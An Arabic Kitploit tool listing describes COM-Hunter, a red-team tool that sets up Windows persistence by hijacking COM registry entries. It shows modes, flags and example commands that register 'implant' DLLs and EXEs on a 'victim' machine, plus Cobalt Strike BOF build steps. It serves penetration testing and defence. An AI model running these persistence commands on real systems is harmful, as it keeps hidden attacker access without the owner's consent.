Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
COM-Hunter — أداة استمرارية عبر اختطاف COM في ويندوز مع أوضاع البحث، الكلاسيكي، جدولة المهام، وTreatAs. متاحة كملف تنفيذي .NET وBOF لـ Cobalt Strike لعمليات الفريق الأحمر. | Kitploit
أدوات/GitHubGitHub/nickvourd/com-hunter
تصعيد الامتيازاتآليات الاستمراريةاختبار الاختراقالفريق الأحمر
GitHubnickvourd/com-hunter

COM-Hunter

أداة استمرارية عبر اختطاف COM في ويندوز مع أوضاع البحث، الكلاسيكي، جدولة المهام، وTreatAs. متاحة كملف تنفيذي .NET وBOF لـ Cobalt Strike لعمليات الفريق الأحمر.

عرض المستودع
38861منذ 24 أيامتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

COM-Hunter

اختراق COM فودو



GitHub License GitHub Repo stars
GitHub forks GitHub watchers GitHub contributors

الوصف

COM-Hunter هي أداة للثبات (persistence) عبر اختراق COM.

متوفرة بنسختين: .NET و BOF متوافقة تماماً مع Cobalt Strike.

Static Badge Static Badge Static Badge

القائمة التالية تشرح الأوضاع المتاحة:

  • وضع البحث: يبحث عن CLSIDs بناءً على LocalServer32 و InprocServer32 وإدخالات التسجيل في كل من HKLM و HKCU.
  • وضع الثبات الكلاسيكي: يقوم بثبات اختراق COM الكلاسيكي باستخدام LocalServer32 أو InprocServer32.
  • وضع جدولة المهام: يقوم تلقائياً بإنشاء ثبات اختراق COM عبر جدولة المهام باستخدام LocalServer32 أو InprocServer32.
  • وضع TreatAs: يقوم بثبات اختراق COM عبر مفتاح التسجيل TreatAs و CLSID وهمي (قابل للإعادة التوجيه) باستخدام LocalServer32 أو InprocServer32.
  • وضع الإزالة: يزيل آليات الثبات التي تعتمد على LocalServer32 و InprocServer32 والإدخالات ذات الصلة في التسجيل تحت كل من و .

ℹ️ تم اختيار هذه الأداة وهي بفخر جزء من Cobalt Strike Community Kit.

إذا وجدت أي أخطاء، فلا تتردد في الإبلاغ عنها. ملاحظاتك ثمينة لتحسين جودة هذا المشروع!

إخلاء المسؤولية

المؤلفون والمساهمون في هذا المشروع غير مسؤولين عن أي استخدام غير قانوني للأداة. هي مخصصة للأغراض التعليمية فقط. يتحمل المستخدمون مسؤولية ضمان الاستخدام القانوني.

جدول المحتويات

  • COM-Hunter
    • الوصف
    • إخلاء المسؤولية
    • جدول المحتويات
    • شكر وتقدير
    • الاستخدام
    • أمثلة .NET
    • تنفيذ BOF
    • المراجع

شكر وتقدير

هذا المشروع تم إنشاؤه بـ ❤️ بواسطة @nickvourd && @S1ckB0y1337.

شكر خاص لصديقي Marios Gyftos على مساعدته القيمة خلال مرحلة الاختبار التجريبي لهذه الأداة.

مستوحى من دورة RTO المقدمة من @zeropointsecltd.

تنفيذ BOF مستوحى من Lefteris Panos ومشروعه الرائع RegPersist.

ملفات base.c و bofdefs.h هي نسخ مباشرة من مشروع CS-Situational-Awareness-BOF التابع لـ TrustedSec.

الاستخدام

root@kitploit:~
 ██████╗ ██████╗ ███╗   ███╗      ██╗  ██╗██╗   ██╗███╗   ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║      ██║  ██║██║   ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗
██║     ██║   ██║██╔████╔██║█████╗███████║██║   ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝
██║     ██║   ██║██║╚██╔╝██║╚════╝██╔══██║██║   ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║      ██║  ██║╚██████╔╝██║ ╚████║   ██║   ███████╗██║  ██║
 ╚═════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝

                                   الإصدار: 3.0
                             @nickvourd && @S1ckB0y1337
                  ~ مستوحى خلال دورة RTO من @zeropointsecltd ~

الاستخدام: COM_Hunter.exe <وضع> <خيارات>

[+] الأوضاع المتاحة:
    search             وضع البحث
    persist            وضع الثبات الكلاسيكي
    tasksch            وضع جدولة المهام
    treatas            وضع TreatAs
    remove             وضع الإزالة

[+] وضع البحث:
الاستخدام: COM-Hunter.exe search <CLSID> <خيارات>
    -a, --all                   ابحث عن تطبيقات DLL و EXE في HKLM و HKCU
    -i, --inprocserver32        ابحث عن تطبيقات DLL في HKLM و HKCU
    -l, --localserver32         ابحث عن تطبيقات EXE في HKLM و HKCU
    -m, --machine               ابحث عن تطبيقات DLL و EXE في HKLM
    -u, --user                  ابحث عن تطبيقات DLL و EXE في HKCU

[+] وضع الثبات الكلاسيكي:
الاستخدام: COM-Hunter.exe persist <CLSID> <مسار_الملف_الثنائي> <خيار>
    -i, --inprocserver32        تعيين تطبيق DLL
    -l, --localserver32         تعيين تطبيق EXE

[+] وضع جدولة المهام:
الاستخدام: COM-Hunter.exe tasksch <مسار_الملف_الثنائي> <خيار>
    -i, --inprocserver32        تعيين تطبيق DLL
    -l, --localserver32         تعيين تطبيق EXE

[+] وضع TreatAs:
الاستخدام: COM-Hunter.exe treatas <CLSID> <CLSID_وهمي> <مسار_الملف_الثنائي> <خيار>
    -i, --inprocserver32        تعيين تطبيق DLL
    -l, --localserver32         تعيين تطبيق EXE

[+] وضع الإزالة:
الاستخدام: COM-Hunter.exe remove <CLSID> <خيارات>
    -a, --all                   إزالة تطبيقات DLL و EXE في HKLM و HKCU
    -i, --inprocserver32        إزالة تطبيقات DLL في HKLM و HKCU
    -l, --localserver32         إزالة تطبيقات EXE في HKLM و HKCU
    -m, --machine               إزالة تطبيقات DLL و EXE في HKLM
    -u, --user                  إزالة تطبيقات DLL و EXE في HKCU

أمثلة .NET

ℹ️ ابحث عن تطبيقات DLL و EXE في HKLM و HKCU:

root@kitploit:~
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

ℹ️ ابحث عن تطبيقات EXE في HKLM و HKCU:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

ℹ️ بحث متقدم عن تطبيقات EXE في HKLM:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine

ℹ️ ابحث عن تطبيقات EXE و DLL في HKCU:

root@kitploit:~
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user

ℹ️ قم بثبات كلاسيكي باستخدام تطبيق DLL:

root@kitploit:~
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

ℹ️ قم بثبات كلاسيكي باستخدام تطبيق EXE:

root@kitploit:~
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32

ℹ️ قم بثبات عبر جدولة المهام باستخدام تطبيق DLL:

root@kitploit:~
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

ℹ️ قم بثبات عبر مفتاح التسجيل TreatAs و CLSID وهمي (قابل للإعادة التوجيه) باستخدام تطبيق DLL:

root@kitploit:~
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i

ℹ️ قم بإزالة ثبات تطبيق DLL في HKCU باستخدام:

root@kitploit:~
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u

تنفيذ BOF

ℹ️ مطلوب سلسلة أدوات MinGW-w64 (x86_64-w64-mingw32-gcc و i686-w64-mingw32-gcc)

ℹ️ قم بتجميع كائنات BOF لكلا المعماريتين:

root@kitploit:~
./make_all.sh

سيؤدي هذا إلى:

  1. إنشاء المجلدات com_hunter_*.
  2. تجميع com_hunter_*.x64.o و com_hunter_*.x86.o.
  3. نقل ملفي الكائن إلى المجلدات com_hunter_*/.

ℹ️ بعد تجميع وحدات BOF، قم بتحميل com_hunter_bof.cna إلى Cobalt Strike.

ℹ️ لتنظيف القطع الأثرية للبناء، ادخل إلى كل مجلد src ونفذ:

root@kitploit:~
make clean

المراجع

  • الثبات: "الاستمرار أو الوجود الطويل لشيء": الجزء 2 – اختراق COM بواسطة MDSec
  • إساءة استخدام بنية تسجيل COM (الجزء 2): تقنيات الاختراق والتحميل بواسطة BOHOPS
  • الثبات على مستوى المستخدم باستخدام المهام المجدولة واختراق معالج COM بواسطة Enigma0x3
  • اختراق كائنات COM بواسطة Virus Total
  • مستودع CS-Remote-OPs-BOF على GitHub بواسطة TrustedSec
  • مقدمة مطور لملفات Beacon Object Files بواسطة TrustedSec
  • دورة تطوير وصناعة BOF بواسطة Zeropoint Security
تنزيل الأداة
HKLM
HKCU